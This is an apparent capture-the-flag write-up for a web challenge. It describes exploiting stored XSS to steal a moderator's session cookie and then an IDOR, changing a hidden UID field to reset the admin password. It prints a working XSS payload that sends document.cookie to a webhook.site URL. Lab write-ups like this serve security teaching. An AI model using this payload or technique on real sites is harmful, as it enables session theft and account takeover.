1️⃣ Web 300: Kryptos Support

During my enumeration I got a field wherein you can submit via form, and another page which is a login portal.

I submitted a test content and got this:

The response above gave me a hint of possible XSS attack. Which leads me to get an Admin Cookies/Session. I sent a crafted xss payload using https://webhook.site.

<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>

Now I have the session cookies.

I installed a cookie editor to use the session that came from the results of my XSS attack.

Then redirected to the admin panel. I didn't find any field or upload files, just the ticket that I submitted.

Upon checking the links, I found a change password field. I tried to change the password of the current account, that's when I noticed that the account I compromised is a moderator.

So I thought that maybe there is an Admin account for this application. Next is enabling the inspect element functions of the browser to check some hidden fields, and that where I got the UID.

I decided to edit the value to 1 and supplied my chosen password and click submit, then I received this message below

I login using admin and my chosen password and was automatically redirected to Home Page with a Flag.

Conclusion: The application is vulnerable to Persistent XSS and IDOR or known as Insecure Direct Object Reference.